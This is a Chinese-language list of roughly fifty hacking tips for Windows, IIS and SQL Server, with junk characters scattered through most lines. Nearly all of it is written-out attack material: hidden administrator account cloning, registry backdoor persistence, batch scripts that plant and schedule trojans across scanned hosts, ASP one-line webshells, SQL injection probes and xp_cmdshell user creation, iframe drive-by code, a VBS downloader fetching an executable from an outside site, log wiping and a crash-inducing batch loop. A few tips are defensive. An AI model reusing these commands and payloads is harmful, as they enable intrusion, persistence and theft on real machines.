1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,6 E$ C+ M' K+ \. o" k0 S) R4 D6 R
cacls C:\windows\system32 /G hqw20:R4 M; P; A! I" |: |
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
( o; }( a7 v" U+ e( `* @0 k2 r恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F8 Q# m, A6 {/ o& G. Z* U% \: F. c/ o
c! `) i; a& _1 D6 A5 P2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。1 ?1 p* N% {1 X$ l
+ Y) K0 X, T7 K9 [: N* J3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。" u0 t- ?( S: b
; @) h' r5 I. Y7 R
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
, a( y% Z! N$ t- ? U* g; @7 G& E. a( k* D) I: F: r4 b
5、利用INF文件来修改注册表
7 F) }2 C0 j! J5 z9 Q J; V[Version]% N$ }6 i' l- A9 ~0 Y" E2 G9 |$ I1 }) K
Signature="$CHICAGO$"
+ O/ C& b0 H; g[Defaultinstall]4 z, K" Y( E, f7 F0 O) h5 b! x
addREG=Ating
" p+ r- x2 ], r7 d7 u5 C[Ating]
2 _ C2 n d, j: E3 i0 iHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 |6 W8 k" W$ L6 F( ]1 f6 F
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:" U5 r/ K4 S& S5 I/ l
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径. [' ]- q* g1 Z: `
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* S; d3 y9 e2 N. r5 B- T, [" c
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU* r2 B* d$ M. p) X, {* R
HKEY_CURRENT_CONFIG 简写为 HKCC
5 }, s& T; Z5 d' @# x$ D0 ]0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值- b4 @9 i: s' R! v; l
"1"这里代表是写入或删除注册表键值中的具体数据) D' [! f2 @* f- }) Z
8 u$ D/ o7 {2 q2 U8 u2 f3 w
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,# G6 Y" N, a( U' }4 Y3 R: i, p2 F
多了一步就是在防火墙里添加个端口,然后导出其键值' m, `7 E/ Q; M. f% ]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
0 `: i7 a, X7 D% W. [: G; ?$ G8 x. u2 a1 O: {0 M( r
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
: d4 [) P8 W3 B5 h在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。4 t+ y0 x/ w, x
& [3 } X4 r) O" e% J8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
- H' l, d8 p8 z z n& [8 K2 k0 _* W5 _/ ?4 ^2 W
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
* ?3 l8 U2 @" \: l- V1 @& M& |可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ \0 h" f0 y/ t0 \: H$ w. L, C. ~7 l) h, I
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”$ B9 @+ S4 }$ ^4 O+ I8 G9 f" l/ g
. y$ {1 O. l7 n+ R/ L3 g
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
, e( D! N4 J; E5 M用法:xsniff –pass –hide –log pass.txt( H' V, u6 o8 `0 q
+ a/ X+ B) x& d) T. h; d6 @5 u
12、google搜索的艺术
3 u% r- a8 V# F3 p搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( a1 F% l# |1 C1 M- ]3 H0 i* y或“字符串的语法错误”可以找到很多sql注入漏洞。
1 ?2 |: Z$ }. `+ |' P6 E) |* g. i! G/ ^
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
0 K! C( z7 [2 _0 x& `, t
! W, D8 u ^/ F7 `: w. a! p3 i: o14、cmd中输入 nc –vv –l –p 19876 Q* ]) T7 x/ d/ w% |2 V
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 M( }' n# z9 P, a2 Y9 F5 z( L( c& X) I8 v* I
15、制作T++木马,先写个ating.hta文件,内容为
6 [8 G" b3 I! m N4 [" E2 q<script language="VBScript">
1 o j0 C) z! S8 k3 gset wshshell=createobject ("wscript.shell" )' p8 P7 {0 H6 u! f. A* z8 z! ?. l
a=wshshell.run("你马的名称",1)
+ \9 z) a5 [* \- k4 m- q% fwindow.close5 A( {! X% f( l V" u
</script>1 s* Z( i3 ], u( |
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
* o9 X# o% k3 K& H5 D, b* G6 w ^0 D M8 g. s$ Y0 B# |2 h
16、搜索栏里输入9 {* k, L, Q( F+ @9 f
关键字%'and 1=1 and '%'='
& @- N7 q6 }, I4 X关键字%'and 1=2 and '%'='7 M2 V" d$ K+ g6 o# E; {
比较不同处 可以作为注入的特征字符0 d2 Z. x9 j2 g) S: s6 c
4 g: u8 I& ]5 }' x
17、挂马代码<html># a5 T5 Z& r; q! h5 N( D$ w* K% x' O
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
- |. [% K' O4 s# @</html>3 C; w( f5 |) d, }
6 o4 L3 r: m. P! P) m18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆," L& ]. ~! |2 }: g
net localgroup administrators还是可以看出Guest是管理员来。
$ E E# o* k2 R9 U8 O1 S6 d5 r* i! @$ U# U. _8 t) {
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等1 S* B2 C9 C4 \
用法: 安装: instsrv.exe 服务名称 路径$ S$ I2 P K" G
卸载: instsrv.exe 服务名称 REMOVE
; M4 Y/ S$ U/ P- G4 g3 b" T, Z* k2 j" t) z% [
+ H& j9 P% x( Y4 Q
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
* F; E# ^) i+ Q) M" l不能注入时要第一时间想到%5c暴库。7 O# \: f" J1 u& Z5 W: u0 h1 O- _+ v
8 v* D9 W- d9 x- r2 u
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( A: T: ]1 |7 n1 M
" S' B3 k1 W3 M5 Q$ Z% e s1 e
23、缺少xp_cmdshell时" ]% n/ A+ B* x' ~! l
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" B. G u9 a0 R; @& x4 x假如恢复不成功,可以尝试直接加用户(针对开3389的)
$ C" E. w8 d* ~+ y# P& h8 edeclare @o int& P" ~+ ^6 S" k3 e l5 u% r
exec sp_oacreate 'wscript.shell',@o out* K# @/ s% g4 V/ f1 \. Q" u
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 X2 D+ N- K5 i4 x
; J. ]2 V- @; U9 H+ M9 G24.批量种植木马.bat
7 A4 X, e/ h# _9 X4 ]0 Xfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中! e' I( G2 m7 ?0 u6 K8 J/ H0 O0 @
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; f* ?+ }- R2 _扫描地址.txt里每个主机名一行 用\\开头
3 K4 q" i2 O" ~2 y, x& S% P( K& H1 O/ i& u. I3 n
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! a, s& G. u7 l3 C& A$ p) ~3 c, }0 B( R8 i
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
$ N' r# }( X% x5 r将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 \ o& x8 T, x$ C; ~
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
: T/ Y; u+ d% r/ l& J
( E* W! a# W2 u- B27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 H8 q% @8 X! p6 Z
然后用#clear logg和#clear line vty *删除日志
/ Q4 U+ ]/ Q/ ~( c2 e, @& _6 S$ J2 G$ l7 M3 Y7 Z
28、电脑坏了省去重新安装系统的方法- a* h. ~' `) v d0 P/ e$ D
纯dos下执行,
9 x8 d/ F7 x' `- O7 x- F9 ixp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
6 b4 `; D S' G2 _0 Y2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' y. o. x9 g4 `- Z3 u( A
d5 j# N3 R7 E: ^
29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 e4 H9 `% f8 U6 iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
, u/ Z4 ~3 F, |: Y# M$ O6 q4 t8 j& O2 HHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 f I! o$ W; V" S: E lHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& U) [) f. V, x$ s分别用
2 t: y X7 N! E( X. Dregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% g1 M+ x+ ]' aregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 u* E O% a4 v# ?( u0 `4 x
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 Q/ c7 F% @. f3 p; D8 c) E
命令来导出注册表项" Q/ l7 X5 V( ]: F: a+ p
然后把三个文件里的EnableSecurityFilters"=dword:00000001,9 H( I1 L5 S6 A) t( E
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ H9 B& v0 r( m [9 g
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。( A1 N9 k& b9 e4 G
4 m) _) ^5 N9 ? H9 S( K30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U5 L/ x1 }! ~8 ~5 {/ @
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的30 L2 n' N* `+ K" F6 J. j
1 ^2 P/ |$ @! S& ?2 ]3 y
31、全手工打造开3389工具* e# }! g Q7 W# ~9 L
打开记事本,编辑内容如下:
* W2 r X9 d( \echo [Components] > c:\sql( e( F4 W2 ?, Y& P; `/ ?4 q
echo TSEnable = on >> c:\sql
, g0 c8 O4 n. [5 Y5 k" R: Ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q- ^5 H% |+ X# U; p/ Z
编辑好后存为BAT文件,上传至肉鸡,执行
( }$ A' p9 J4 G+ C, u1 k. | D! K9 r3 o( D9 j* J& Z( X) a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马3 S. H0 E( ~! r4 ?
+ g% M, ]" G" P0 ?4 r5 d33、让服务器重启& r- r8 V8 h) f' d+ @- X
写个bat死循环:
0 p' T* E1 a7 n( H: T@echo off
\2 j0 a B. j6 D:loop1' V3 F$ R! E- Q1 x
cls5 G- K; J$ K8 Z0 V
start cmd.exe; w( V& m' @$ i' X" J
goto loop17 c8 s, \! [0 f
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启& q* r% W( n8 q; C; `3 H
3 E" ]3 f, E8 I) f" b0 {% n" D34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,) G2 t' \. t: _' R8 U
@echo off6 l$ y* ~% Y' d- A( S
date /t >c:/3389.txt1 A" y* b3 ~8 j; q# |. f
time /t >>c:/3389.txt' a0 b/ e( x. u( Y$ A' o
attrib +s +h c:/3389.bat9 J" R' I1 D; [( h/ ^
attrib +s +h c:/3389.txt( [5 Z' V$ q+ `$ H* i
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 P/ s0 y* z, X$ R并保存为3389.bat
0 Y4 B7 {$ P. }; ]打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! F& v) d$ a3 q2 z5 s: a Q1 [0 e" T* ?% n- u$ U$ T
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 V# r* M' x0 s' X8 U2 astart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页). ]8 j% s2 S2 c; ]1 n
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
1 M, K T% `" ?/ t" {' V3 |8 m1 [+ k U
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. Y( B' N% ]) l' ` |
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( b5 a; k& [. k1 X/ }echo 你的FTP账号 >>c:\1.bat //输入账号
" X1 ]7 u/ u4 becho 你的FTP密码 >>c:\1.bat //输入密码
8 I3 t/ z1 _! c; pecho bin >>c:\1.bat //登入
$ X% t/ ~5 C3 D0 J! lecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
3 X8 L8 h9 h- J, Z: q* Eecho bye >>c:\1.bat //退出! w% F9 I7 d# s6 [1 i
然后执行ftp -s:c:\1.bat即可$ s4 r$ W W5 |% T; {$ [; c2 m
& \. `) O; N- q: a. |
37、修改注册表开3389两法8 a0 g1 `) K9 e
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表2 Y6 ?: o" w2 J9 N) n
echo Windows Registry Editor Version 5.00 >>3389.reg# d% x% S4 N1 q* Z) Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) u- Y1 Q9 p4 ~( W
echo "Enabled"="0" >>3389.reg
5 {6 I9 L8 \" Q3 uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* ]8 H6 s0 |5 H p; MNT\CurrentVersion\Winlogon] >>3389.reg+ t; s# n' q9 A9 A! u! X, C
echo "ShutdownWithoutLogon"="0" >>3389.reg
2 M! k& `* K4 decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]: m0 ~8 Z4 I9 `5 J, K, S
>>3389.reg
2 k# X5 N7 v# ^, _3 h0 a% eecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
1 ?3 M* P# G( F/ ]/ Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]* D1 ~; k7 k2 k$ |
>>3389.reg
, O d( b2 o6 z( f* ?! a. secho "TSEnabled"=dword:00000001 >>3389.reg; v. n4 F) `: E7 ^& e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 q' j+ z6 L1 p' ]' \, {' pecho "Start"=dword:00000002 >>3389.reg
. y* G2 L' A" B6 K- {; O4 n% ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
" I# T, n1 ~0 r>>3389.reg
6 p/ n6 X0 b9 z) A4 lecho "Start"=dword:00000002 >>3389.reg
3 u1 R. y$ E9 a8 T* l( r9 Wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ o* }) C- F1 I2 t+ Qecho "Hotkey"="1" >>3389.reg! _$ n8 W. P/ e4 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 d5 p! S% T8 c/ b3 n1 cServer\Wds\rdpwd\Tds\tcp] >>3389.reg
2 k7 k" u2 f" techo "PortNumber"=dword:00000D3D >>3389.reg
# `; V( l2 v8 q8 J4 X. gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 |" s" w- T B) F4 ?
Server\WinStations\RDP-Tcp] >>3389.reg
/ `" I7 ]' L6 v" _echo "PortNumber"=dword:00000D3D >>3389.reg
4 e! H$ r, T( j把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
# n3 F: q9 B1 a" D/ ^' b(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
: G( I- D& v' x1 Y: V因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效: P; ?* ?0 T8 C$ J& w. p$ V" s4 n @
(2)winxp和win2003终端开启
6 E/ y8 ?1 x9 i" Y用以下ECHO代码写一个REG文件:6 v9 A" d4 C! l$ O7 }
echo Windows Registry Editor Version 5.00>>3389.reg" l" k0 u0 Z& V8 X* |8 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% s0 L: n' k) c1 e* R, c' w6 eServer]>>3389.reg+ {8 p @3 N6 K: x
echo "fDenyTSConnections"=dword:00000000>>3389.reg
, o" W T8 D6 e. y E3 Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ ]; ?. R' ~7 G) b6 B" bServer\Wds\rdpwd\Tds\tcp]>>3389.reg
, g& O T e p- k' Secho "PortNumber"=dword:00000d3d>>3389.reg5 A* J9 A. V" w: z6 w: A, V8 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal ~7 \/ H y* z5 ?
Server\WinStations\RDP-Tcp]>>3389.reg0 j9 K' R1 |- x+ W5 D1 i7 k) e
echo "PortNumber"=dword:00000d3d>>3389.reg
4 g. k1 P; H5 [' q4 _) w, h然后regedit /s 3389.reg del 3389.reg2 ?$ Z* P- j" z$ S; P# W
XP下不论开终端还是改终端端口都不需重启
& Q) A B+ `8 Y+ m' e' y; P( e! S6 Z
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃% j% l+ K3 I2 {& p& B9 ^7 G) c4 g: R
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
; D& X* d' N% o8 t- p& i* U* f1 [$ t5 w; F2 w. M
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
: z( m$ W* g& |" U5 L. v(1)数据库文件名应复杂并要有特殊字符1 T2 T) K1 {# j* y8 Q# L
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
& H& @9 p4 D3 ?( k将conn.asp文档中的
. X; j4 A$ x" GDBPath = Server.MapPath("数据库.mdb"). @7 e6 d) a$ c8 m# S9 ~2 Q
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath3 p8 S4 [; }: G
' L. _% ^4 y& p" i0 u7 X
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, _# w8 m- U3 h( S5 c, q(3)不放在WEB目录里
6 o. A% _2 L' z9 P: q/ I# n2 | ^8 _0 G, H' Y
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉: c L! X8 U/ N4 U
可以写两个bat文件' N0 H, F4 q% T- S1 `1 T
@echo off
( P% e* O! `% p. Z8 {0 \@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe# s# |) h, p, U: M1 a
@del c:\winnt\system32\query.exe4 p* X* F' L& B4 ?; [8 J, x/ m
@del %SYSTEMROOT%\system32\dllcache\query.exe
6 |8 M ^* Y. k/ u@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 C/ I9 c! T' v3 Z4 C
" D4 O& Q! ~! G7 F5 Q6 p( G7 E
@echo off
* T# i7 l7 E: E: c4 S+ a4 N@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ q9 L* v9 w* w9 z
@del c:\winnt\system32\tsadmin.exe
' `6 \6 q* w; R@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex5 `5 V$ c% W1 ^7 r" ?* c$ F% I
1 `+ o8 \4 b0 }# O6 h! @41、映射对方盘符! a: S( |' C" H( k# q1 O
telnet到他的机器上,
/ i: P; F4 y0 H% ^5 C. w. N( Y; v0 v/ Inet share 查看有没有默认共享 如果没有,那么就接着运行
5 E( m- z5 A, \net share c$=c:
' v O* }( s* x9 Qnet share现在有c$4 Q8 G, M/ z% H2 o2 u
在自己的机器上运行
9 o5 T7 G, h( U, O' unet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# d3 J0 ~4 f* z' g* i7 ?/ a) Z! G
# Q$ _$ {! ]8 o9 O42、一些很有用的老知识
T) z/ ]% k) wtype c:\boot.ini ( 查看系统版本 )
3 a/ G# }/ F, @$ ~( Pnet start (查看已经启动的服务)2 L/ F. k, F7 M5 p% Q- f
query user ( 查看当前终端连接 ): r( f% Z% {* M2 x
net user ( 查看当前用户 )2 w7 s( c+ _0 {
net user 用户 密码/add ( 建立账号 )) a6 N) g# |. G! k4 g( _) D
net localgroup administrators 用户 /add (提升某用户为管理员); ]1 Y4 _* K- N' n9 d$ h1 \3 }
ipconfig -all ( 查看IP什么的 )
- u# X* \3 s, ?& @$ K( P" {netstat -an ( 查看当前网络状态 )8 m9 }8 ^4 M T4 N$ b
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
8 u6 ?, u6 i$ K# J克隆时Administrator对应1F4
9 Q7 u: O. _3 f3 Y7 I1 c/ d! oguest对应1F5- v4 T% I5 r3 X# j" O, b4 ]
tsinternetuser对应3E8' \4 O! |2 @2 b* m+ n; c6 @
+ W. k4 |: Z: I0 Y
43、如果对方没开3389,但是装了Remote Administrator Service8 f6 m) c2 P) U; |) ?' k
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接* C U; U, E/ |# ]) g- H
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息5 m0 z6 k1 k1 w2 J% H+ d% K3 o
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 B( w+ e0 f* o- F" s, w
, a9 x6 b3 T/ [+ a+ R& \
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定): N) g/ K+ ^+ x7 t- \
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)" _* q, M/ [3 p* [: j5 S5 ^1 O
. G$ r3 Q# E/ o& T' {45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
1 A( M. l9 p. @% D3 y% T* J' Pecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( R2 x& u- n% `; }2 j. r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =1 o- y5 e& ?3 [. n0 G H
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- }& Q4 k- E; [; Z" g' p, k
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs# p$ _+ W0 c$ V6 O
(这是完整的一句话,其中没有换行符)* [% N! d- R2 b+ J9 H" g
然后下载:7 ^) l1 d6 C2 q' [/ Q
cscript down.vbs http://www.hack520.org/hack.exe hack.exe* y5 X3 l) B7 e& n6 S
6 M" I. F ?' d7 L46、一句话木马成功依赖于两个条件:* ^; z3 M0 k" U( \
1、服务端没有禁止adodb.Stream或FSO组件- O% I/ F6 E& ?# ]' `# P6 G$ \6 r
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
+ w9 y. _7 O3 J# D+ Y; {- y" u" u6 a* D) A2 N
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. E" g) N" C% @7 b% L$ V/ h4 F;alter database utsz set RECOVERY FULL--9 S7 ]3 ~6 k1 r, k# l3 T
;create table cmd (a image)--
) B3 S: [2 a$ @6 R5 R' t Y1 [: _/ z& n;backup log utsz to disk = 'D:\cmd' with init--" E8 i; G% p3 y4 v/ F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
, p8 T( G( l3 G( n/ R/ N4 E' L;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
6 {9 {+ R2 ~, v/ m注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。5 Q; u. I. l; i
! o; f4 g+ L4 R1 t4 z/ P- ~% e
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! R F/ f2 `7 x! i6 I9 k$ c
# @- `6 t+ _ h) H) P! \
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
( s F" Q) B0 Q4 ?所有会话用 'all'。
) v _) Z. s0 _( Y: l7 Y-s sessionid 列出会话的信息。* ~9 f* B5 n/ j3 g4 o: k
-k sessionid 终止会话。
0 x* @, y( O6 f/ O8 l) m; i-m sessionid 发送消息到会话。7 h' O, n5 g: V( O' q7 m6 s
5 I8 r: [) `0 L& a3 i4 Y( G) T
config 配置 telnet 服务器参数。
8 S; S0 g* P. Y+ U1 c. \
# [# @3 U( a5 pcommon_options 为:
) I3 i5 L+ M/ v( Z: ?-u user 指定要使用其凭据的用户
( m2 d( C" y1 n5 B' I1 m; E3 B-p password 用户密码
8 P: y( g6 [" Y3 E8 Y
" y9 D% g# m, aconfig_options 为:" H7 |0 ?5 H% W3 [ S3 J" A
dom = domain 设定用户的默认域
$ R( d3 }# N0 e( Zctrlakeymap = yes|no 设定 ALT 键的映射
1 ^& z) u5 o W/ i# v# i% gtimeout = hh:mm:ss 设定空闲会话超时值1 p! ^' F: S" i$ ]+ x' w* _3 }
timeoutactive = yes|no 启用空闲会话。
5 g3 F9 F1 N- \1 u# W7 u( k' Amaxfail = attempts 设定断开前失败的登录企图数。
* w( d& Z) |- bmaxconn = connections 设定最大连接数。
# B) A% ^3 d: T7 ^( {, i1 k9 nport = number 设定 telnet 端口。5 s8 R& O$ Q! `* O4 }
sec = [+/-]NTLM [+/-]passwd) O3 s- r2 @/ n7 A- X2 T0 C
设定身份验证机构
( S- E8 p( Q5 b2 X. i q* Hfname = file 指定审计文件名。
7 C1 l! R& B9 T! P9 N" ufsize = size 指定审计文件的最大尺寸(MB)。
. F+ j9 Y5 Q' u0 B2 s6 }mode = console|stream 指定操作模式。( Z( {0 Y$ ^# a+ r3 Y9 _) M
auditlocation = eventlog|file|both5 ^ d- ~' }9 ^7 n/ q$ j9 Z) T2 m
指定记录地点
% f k6 j5 ` ? ~1 U' `1 J+ vaudit = [+/-]user [+/-]fail [+/-]admin- z$ T1 A6 a4 e, B9 n5 {
0 M) U( `5 D( S49、例如:在IE上访问:( J# m( v. w; [, l) f* |) V1 l- y4 \
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' U1 N9 K4 P# m. w( K, jhack.txt里面的代码是:& _, c/ x; K& u- Z; ?, C
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
. R$ J0 s1 C9 V4 W8 A( l把这个hack.txt发到你空间就可以了!
$ j: w% n0 F5 l9 U这个可以利用来做网马哦!7 ~( h: `% P/ C& a3 @5 w
2 V7 R+ G' f* M2 }9 t
50、autorun的病毒可以通过手动限制!
( b9 p' \, q2 |! U1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, u' R1 a4 M6 P( D' [7 ?5 |# G2 U8 C. W
2,打开盘符用右键打开!切忌双击盘符~
P, Z( P& i; s C- n/ o3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. `+ Z2 D. C6 U/ J# I5 X8 M
1 I. B0 ?1 h1 i
51、log备份时的一句话木马:
8 z) f9 c5 d# g# ^0 b, ]2 fa).<%%25Execute(request("go"))%%25>
: }1 w) k, m: G; r2 ~b).<%Execute(request("go"))%>
7 i8 @/ N( Z; Y4 c. S) cc).%><%execute request("go")%><%+ H5 t) N8 D/ S4 }1 S. u
d).<script language=VBScript runat=server>execute request("sb")</Script>1 P; A0 _( S, p/ ]# T
e).<%25Execute(request("l"))%25>
8 }) _+ b v. W( F. V* Zf).<%if request("cmd")<>"" then execute request("pass")%>: \8 m4 _# U9 F D% k) P
4 \- K* |7 r( Y: m! L52、at "12:17" /interactive cmd
. s9 i, x$ q; A1 [ v0 j执行后可以用AT命令查看新加的任务
+ t. G( _' T7 O) J" [用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。# M7 @& Y7 N% p& @8 `
